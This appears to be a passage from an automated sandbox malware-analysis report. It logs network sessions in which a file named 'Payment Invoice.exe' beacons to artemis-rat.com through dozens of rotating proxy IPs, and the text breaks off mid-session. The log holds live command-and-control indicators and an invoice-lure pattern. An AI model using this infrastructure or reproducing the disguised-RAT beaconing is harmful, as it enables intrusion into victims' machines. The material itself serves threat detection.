                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.889034033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.978369951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.085859060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.153203011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:50.276746988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:02.276760101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:14.276837111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:38.292401075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:26.401793957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1874192.168.2.452906217.52.247.8619817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.048554897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.089442015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.205358028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.289974928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:50.386111021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:02.386286020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:14.386271954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:38.386181116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:26.401808023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1875192.168.2.455150103.188.168.6680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.050462961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1876192.168.2.455188184.170.245.14841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.051757097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1877192.168.2.45519847.100.236.2380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.051757097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.133636951 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1878192.168.2.455204142.54.228.19341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.051846027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1879192.168.2.455178192.252.215.5161377076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.063333035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1880192.168.2.453063192.163.202.88475857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.084503889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.089436054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.205467939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.289994955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:50.386112928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:02.386224985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:14.386301041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:38.386182070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:26.401937962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1881192.168.2.455207209.14.112.810807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.084507942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1882192.168.2.455203103.76.12.5831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.136382103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1883192.168.2.453015170.187.225.102807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.136435032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.264686108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.341444016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.430274010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:50.589294910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:02.589226007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:14.589216948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:38.589248896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:26.680108070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1884192.168.2.45520579.110.201.23580817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.136766911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1885192.168.2.455211196.20.125.12980837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.136830091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1886192.168.2.45520645.11.95.16552197076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.137021065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1887192.168.2.453057103.200.135.22941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.187299013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1888192.168.2.455210119.18.149.3480807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.209517002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1889192.168.2.455220138.2.73.15710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.224328995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1890192.168.2.4552268.130.39.11733897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.253190994 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:28.586617947 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1891192.168.2.45521945.120.178.19710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.266016960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.048501015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1892192.168.2.455225138.36.150.2610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.283930063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1893192.168.2.45518745.65.65.1841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.308029890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1894192.168.2.45311491.134.140.160208967076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.341496944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.026711941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.714657068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.027003050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.526926994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.011528015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.511277914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1895192.168.2.455185176.113.157.149374177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.342170954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1896192.168.2.453095103.156.96.1210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.457479000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.514981985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1897192.168.2.45442047.91.65.2331287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.459373951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.347812891 CET38INHTTP/1.1 200 OK
                                                                content-length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1898192.168.2.45523385.116.120.10636297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.471730947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1899192.168.2.454950119.3.215.4188887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.474193096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1900192.168.2.45516347.74.152.2988887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.519326925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.292514086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
